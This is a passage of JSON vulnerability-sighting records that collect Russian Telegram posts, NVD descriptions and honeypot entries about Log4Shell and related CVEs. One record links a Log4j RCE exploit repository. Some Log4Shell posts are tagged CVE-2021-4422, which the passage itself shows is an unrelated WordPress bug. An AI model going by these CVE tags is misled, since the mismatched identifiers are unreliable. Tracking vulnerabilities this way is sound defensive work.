\u043d\u043e\u0432\u043e\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f Log4Shell \u0434\u043b\u044f \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u0438\u043c \u0442\u0440\u043e\u044f\u043d\u043e\u043c \u00abDridex\u00bb \u0438\u043b\u0438 \u00abMeterpreter\u00bb.\n\n\u0418 \u0434\u0430\u043d\u043d\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u043e\u043b\u0435\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u0430, \u0432\u0435\u0434\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0434\u0430\u0436\u0435 \u043d\u0435 \u043f\u0440\u0438\u0434\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0442\u044c \u043a\u0430\u043a\u0430\u044f \u0443 \u0436\u0435\u0440\u0442\u0432\u044b \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430. \u0412\u0441\u0435 \u043f\u043e\u0442\u043e\u043c\u0443, \u0447\u0442\u043e Java \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0444\u0430\u0439\u043b HTA, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0441\u0430\u043c \u0442\u0440\u043e\u044f\u043d Dridex, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0439 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows. \u041e\u0434\u043d\u0430\u043a\u043e \u0435\u0441\u043b\u0438 \u044d\u0442\u043e \u043d\u0435 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u044b Windows \u043d\u0435 \u043c\u043e\u0433\u0443\u0442 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u0441\u044f \u0438\u043b\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u0441\u044f, \u0442\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u0430\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u043d\u0435 \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u044d\u0442\u0438\u0445 \u0437\u0430\u0434\u0430\u0447 \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u043d\u0430 Python \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 Meterpreter, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u0430\u043a \u0440\u0430\u0437 \u043f\u0440\u0438\u0441\u043f\u043e\u0441\u043e\u0431\u043b\u0435\u043d \u0434\u043b\u044f \u041e\u0421 Linux / Unix.\n\n\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 Log4j \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u0430\u043c\u0438, \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0449\u0438\u043c\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0448\u0438\u0440\u043e\u043a\u0438\u0439 \u0441\u043f\u0435\u043a\u0442\u0440 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c, \u043d\u0435\u0443\u0434\u0438\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0442\u043e \u0431\u043e\u043b\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043d\u0430\u0447\u043d\u0443\u0442 \u043d\u0430\u0446\u0435\u043b\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c.\n\u0410 \u043d\u0430\u043c \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c\u0441\u044f \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u0441 \u043d\u043e\u0432\u044b\u043c\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438, \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c Log4j \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432\u0441\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u043c\u0438 \u0441\u043a\u0430\u043d\u0435\u0440\u0430\u043c\u0438, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, log4jScanner.\n@NeKaspersky", "creation_timestamp": "2021-12-22T15:51:02.000000Z"}, {"uuid": "5120bd9a-463f-4beb-a610-c4d55ce603c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4422", "type": "seen", "source": "https://t.me/NeKaspersky/1550", "content": "\u041d\u043e\u0432\u0430\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u043f\u043e\u0447\u0442\u0438 \u0432\u0441\u0435\u0445.\n\n\u0412 \u044d\u0442\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0435 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Java. \u0415\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u00abLog4Shell\u00bb \u0438\u043b\u0438 CVE-2021-44228. \n\n\u0422\u043e, \u0447\u0442\u043e \u043e\u043d\u0430 \u0432\u044b\u0437\u0432\u0430\u043b\u0430 \u0442\u0430\u043a\u043e\u0439 \u0440\u0435\u0437\u043e\u043d\u0430\u043d\u0441 \u0432 \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435 \u2014 \u043d\u0435 \u0443\u0434\u0438\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u0432\u0435\u0434\u044c \u0435\u0451 \u043e\u0446\u0435\u043d\u043a\u0430 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSSv3 \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442 10/10. \u041a \u0442\u043e\u043c\u0443 \u0436\u0435 \u0435\u0435 \u043e\u0447\u0435\u043d\u044c \u043f\u0440\u043e\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c. \u0414\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f RCE \u043f\u0440\u0438 \u0435\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0432\u0432\u043e\u0434\u0430 \u043e\u0434\u043d\u043e\u0439 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u0447\u043a\u0438 \u043a\u043e\u0434\u0430. \n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-44228 \u0431\u044b\u043b\u0438 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043d\u0443\u0442\u044b \u0442\u0430\u043a\u0438\u0435 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b, \u043a\u0430\u043a Steam (\u043e\u043a\u043d\u043e \u043f\u043e\u0438\u0441\u043a\u0430), Apple (icloud) \u0438 Minecraft (\u043a\u0430\u043a \u0438 \u0441\u0435\u0440\u0432\u0435\u0440, \u0442\u0430\u043a \u0438 \u043a\u043b\u0438\u0435\u043d\u0442, \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0432\u0432\u0435\u0441\u0442\u0438 PoC \u0432 \u0447\u0430\u0442\u0435), \u0430 \u0442\u0430\u043a\u0436\u0435 \u0442\u044b\u0441\u044f\u0447\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439, \u0441 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u044c\u0441\u044f \u0442\u0443\u0442: \u0441\u0441\u044b\u043b\u043e\u0447\u043a\u0430.  \n\n\u041f\u0440\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0435 CVE-2021-4422 \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:\n\u2022  \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0433\u043e \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b.\n\u2022  \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u043d\u0430\u0434\u0435\u0436\u043d\u043e \u0438 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\u2022  \u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0435\u0440\u0441\u0438\u0439 Log4j 2.\n\u2022  \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0449\u0435\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0435\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443.\n\u2022  \u041e\u0434\u043d\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0430\u0437\u043e\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 Java \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\nApache log4j \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u0432\u0435\u0440\u0441\u0438\u0438 2.15.0. \u041e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043c\u043e\u0447\u044c \u043d\u0435\u043d\u0430\u0434\u043e\u043b\u0433\u043e. \u041a\u043e\u0433\u0434\u0430 \u0431\u0443\u0434\u0443\u0442 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Java \u2014 \u0432\u043e\u043f\u0440\u043e\u0441 \u0432\u0440\u0435\u043c\u0435\u043d\u0438.\n@NeKaspersky", "creation_timestamp": "2021-12-14T11:04:35.000000Z"}, {"uuid": "6b1b5a76-64bb-4154-98da-270fa19c8ab8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/NeKaspersky/1550", "content": "\u041d\u043e\u0432\u0430\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u043f\u043e\u0447\u0442\u0438 \u0432\u0441\u0435\u0445.\n\n\u0412 \u044d\u0442\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0435 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Java. \u0415\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u00abLog4Shell\u00bb \u0438\u043b\u0438 CVE-2021-44228. \n\n\u0422\u043e, \u0447\u0442\u043e \u043e\u043d\u0430 \u0432\u044b\u0437\u0432\u0430\u043b\u0430 \u0442\u0430\u043a\u043e\u0439 \u0440\u0435\u0437\u043e\u043d\u0430\u043d\u0441 \u0432 \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435 \u2014 \u043d\u0435 \u0443\u0434\u0438\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u0432\u0435\u0434\u044c \u0435\u0451 \u043e\u0446\u0435\u043d\u043a\u0430 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSSv3 \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442 10/10. \u041a \u0442\u043e\u043c\u0443 \u0436\u0435 \u0435\u0435 \u043e\u0447\u0435\u043d\u044c \u043f\u0440\u043e\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c. \u0414\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f RCE \u043f\u0440\u0438 \u0435\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0432\u0432\u043e\u0434\u0430 \u043e\u0434\u043d\u043e\u0439 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u0447\u043a\u0438 \u043a\u043e\u0434\u0430. \n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-44228 \u0431\u044b\u043b\u0438 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043d\u0443\u0442\u044b \u0442\u0430\u043a\u0438\u0435 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b, \u043a\u0430\u043a Steam (\u043e\u043a\u043d\u043e \u043f\u043e\u0438\u0441\u043a\u0430), Apple (icloud) \u0438 Minecraft (\u043a\u0430\u043a \u0438 \u0441\u0435\u0440\u0432\u0435\u0440, \u0442\u0430\u043a \u0438 \u043a\u043b\u0438\u0435\u043d\u0442, \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0432\u0432\u0435\u0441\u0442\u0438 PoC \u0432 \u0447\u0430\u0442\u0435), \u0430 \u0442\u0430\u043a\u0436\u0435 \u0442\u044b\u0441\u044f\u0447\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439, \u0441 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u044c\u0441\u044f \u0442\u0443\u0442: \u0441\u0441\u044b\u043b\u043e\u0447\u043a\u0430.  \n\n\u041f\u0440\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0435 CVE-2021-4422 \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:\n\u2022  \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0433\u043e \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b.\n\u2022  \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u043d\u0430\u0434\u0435\u0436\u043d\u043e \u0438 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\u2022  \u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0435\u0440\u0441\u0438\u0439 Log4j 2.\n\u2022  \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0449\u0435\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0435\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443.\n\u2022  \u041e\u0434\u043d\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0430\u0437\u043e\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 Java \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\nApache log4j \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u0432\u0435\u0440\u0441\u0438\u0438 2.15.0. \u041e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043c\u043e\u0447\u044c \u043d\u0435\u043d\u0430\u0434\u043e\u043b\u0433\u043e. \u041a\u043e\u0433\u0434\u0430 \u0431\u0443\u0434\u0443\u0442 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Java \u2014 \u0432\u043e\u043f\u0440\u043e\u0441 \u0432\u0440\u0435\u043c\u0435\u043d\u0438.\n@NeKaspersky", "creation_timestamp": "2021-12-14T11:04:35.000000Z"}, {"uuid": "7ca29c29-b5e1-45f2-bc08-ad35244a2c4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-29)", "content": "", "creation_timestamp": "2026-04-29T00:00:00.000000Z"}, {"uuid": "9e4929a6-ab99-490a-87f6-9794898697a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4422", "type": "seen", "source": "https://t.me/cibsecurity/66474", "content": "\u203c CVE-2021-4422 \u203c\n\nThe POST SMTP Mailer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.20. This is due to missing or incorrect nonce validation on the handleCsvExport() function. This makes it possible for unauthenticated attackers to trigger a CSV export via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-07-12T12:35:39.000000Z"}, {"uuid": "fe22b480-9762-4426-a974-764cb1112665", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/cibsecurity/48659", "content": "\u203c CVE-2021-4125 \u203c\n\nIt was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift metering hive containers was incomplete, as not all JndiLookup.class files were removed. This CVE only applies to the OpenShift Metering hive container images, shipped in OpenShift 4.8, 4.7 and 4.6.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-08-24T20:22:51.000000Z"}, {"uuid": "26557083-fdf4-462a-bc40-d463f84e57b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-29)", "content": "", "creation_timestamp": "2026-04-29T00:00:00.000000Z"}, {"uuid": "ed3ecadf-27f2-4138-9343-685783b63286", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44226", "type": "seen", "source": "https://t.me/cibsecurity/39464", "content": "\u203c CVE-2021-44226 \u203c\n\nRazer Synapse before 3.7.0228.022817 allows privilege escalation because it relies on %PROGRAMDATA%\\Razer\\Synapse3\\Service\\bin even if %PROGRAMDATA%\\Razer has been created by any unprivileged user before Synapse is installed. The unprivileged user may have placed Trojan horse DLLs there.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-03-24T01:28:59.000000Z"}, {"uuid": "d3b5d61c-e484-4380-9a40-6d1529a56ab1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/cibsecurity/44725", "content": "\u203c CVE-2022-33915 \u203c\n\nVersions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.3.5 are affected by a race condition that could lead to a local privilege escalation. This Hotpatch package is not a replacement for updating to a log4j version that mitigates CVE-2021-44228 or CVE-2021-45046; it provides a temporary mitigation to CVE-2021-44228 by hotpatching the local Java virtual machines. To do so, it iterates through all running Java processes, performs several checks, and executes the Java virtual machine with the same permissions and capabilities as the running process to load the hotpatch. A local user could cause the hotpatch script to execute a binary with elevated privileges by running a custom java process that performs exec() of an SUID binary after the hotpatch has observed the process path and before it has observed its effective user ID.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-17T16:23:35.000000Z"}, {"uuid": "a962e2a3-c889-4b4b-ac22-1697fb026615", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1361", "content": "#CVE-2021\n#Log4j\n\nLog4j RCE - (CVE-2021-44228)\n\nhttps://github.com/momos1337/Log4j-RCE\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T23:43:09.000000Z"}, {"uuid": "689f7fb3-6a66-45c7-b596-01b02089f9be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/cibsecurity/36863", "content": "\u274c \u2018Long Live Log4Shell\u2019: CVE-2021-44228 Not Dead Yet \u274c\n\nThe ubiquitous Log4j bug will be with us for years. John Hammond, senior security researcher at Huntress, discusses what's next.\n\n\ud83d\udcd6 Read\n\nvia \"Threat Post\".", "creation_timestamp": "2022-02-04T20:17:36.000000Z"}, {"uuid": "6ec00403-b38d-45f2-8de9-5a77b7722f32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/cibsecurity/41158", "content": "\u203c CVE-2022-0070 \u203c\n\nIncomplete fix for CVE-2021-3100. The Apache Log4j hotpatch package starting with 